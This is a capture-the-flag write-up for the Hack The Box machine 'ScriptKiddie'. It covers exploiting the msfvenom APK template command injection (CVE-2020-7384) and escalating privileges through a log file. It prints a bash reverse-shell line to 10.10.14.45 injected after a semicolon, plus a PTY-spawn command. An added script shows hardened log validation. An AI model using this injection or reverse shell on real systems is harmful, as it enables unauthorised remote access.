Hackthebox: ScriptKiddie

CVE-2020-7384: MsfVenom APK template command injection.

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/

Fire up Metasploit:

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

Copy your payload from /root/.msf4/local/msf.apk.

Then upload your msf.apk payload here.

But before you click generate, prepare your listener first.

Now we have successfully established our reverse shell.

Spawn a PTY for a standard shell:

python3 -c 'import pty; pty.spawn("bash")'

Get the user.txt flag.

Horizontal privilege escalation.

The log variable reads the file called hackers as an argument.

So we are going to put a script into the hackers file as that argument:

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.45/1337 0>&1' #" >> hackers
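
The hardened counterpart of the pattern abused above, as an added example that is not part of the original writeup or the box's own script: a log field is validated as an IPv4 address and only then handed to a fixed command as a single quoted argument. The log layout (`<date> <time> <source>`), the function names and the `scanner` command are assumptions, and the sample log is constructed.

```shell
#!/bin/sh
# Added example, not the box's script. Assumed log line: "<date> <time> <source>".

# Succeed only for a dotted-quad IPv4 address with each octet in 0..255.
is_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # empty, stray chars, empty octet
    esac
    old_ifs=$IFS; IFS=.
    set -- $1                                  # split on dots (digits and dots only)
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}

# Vulnerable pattern (comment only, never run here):
#   sh -c "scanner ${source}"    # the field is re-parsed as shell code
# Hardened pattern: validate the field, then pass it as one quoted argument
# to a fixed command, so it never reaches a shell parser.
process_log() {
    while read -r _date _time source; do
        if is_ipv4 "$source"; then
            # "scanner" is hypothetical; printf stands in for: scanner "$source"
            printf 'SCAN %s\n' "$source"
        else
            printf 'REJECT %s\n' "$source"
        fi
    done < "$1"
}

# Constructed sample log; the second and third entries must be rejected.
make_sample_log() {
    sample=$(mktemp) || return 1
    printf '%s\n' \
        '2021-02-06 10:00:01 10.10.14.7' \
        '2021-02-06 10:00:02 ;touch /tmp/injected #' \
        '2021-02-06 10:00:03 999.1.1.1' > "$sample"
    printf '%s\n' "$sample"
}

log=$(make_sample_log)
process_log "$log"
rm -f "$log"
```

Rejected entries are worth alerting on: a log line whose source field contains shell metacharacters is a sign that someone is writing to the file directly.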

We can run msfconsole without the root password.

Cybersecurity Analyst | Penetration Tester | CTF Player

edbert sumicad
